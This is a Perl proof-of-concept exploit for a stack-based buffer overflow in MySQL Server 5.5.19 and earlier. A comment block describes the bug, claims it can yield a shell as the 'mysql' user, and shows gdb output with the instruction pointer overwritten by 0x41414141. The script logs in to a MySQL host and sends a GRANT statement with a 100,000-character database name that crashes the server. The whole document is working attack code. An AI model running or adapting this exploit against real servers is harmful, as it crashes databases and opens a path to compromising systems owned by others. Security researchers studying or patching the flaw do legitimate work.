#!/usr/bin/perl=for comment
MySQL Server exploitable stack based overrun
Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too)
unprivileged user (any account (anonymous account?), post auth)
as illustrated below the instruction pointer is overwritten with 0x41414141
bug found by Kingcope
this will yield a shell as the user 'mysql' when properly exploited
mysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core
GNU gdb (GDB) SUSE (7.2-3.3)
Copyright (C)2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.Type "show copying"
and "show warranty"for details.
This GDB was configured as "i586-suse-linux".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Missing separate debuginfo for the main executable file
Try: zypperinstall-C"debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803"[New Thread 8801][New Thread 8789][New Thread 8793][New Thread 8791][New Thread 8787][New Thread 8790][New Thread 8799][New Thread 8794][New Thread 8792][New Thread 8788][New Thread 8800][New Thread 8786][New Thread 8797][New Thread 8798][New Thread 8785][New Thread 8796][New Thread 8783]
Core was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'.
Program terminated with signal 11, Segmentation fault.
#00x41414141 in ?? ()
(gdb)
=cut
use strict;
use DBI();
# Connect to the database.
my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
"user", "secret",
{'RaiseError' => 1});
$a ="A" x 100000;
my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");$sth->execute();# Disconnect from the database.$dbh->disconnect();
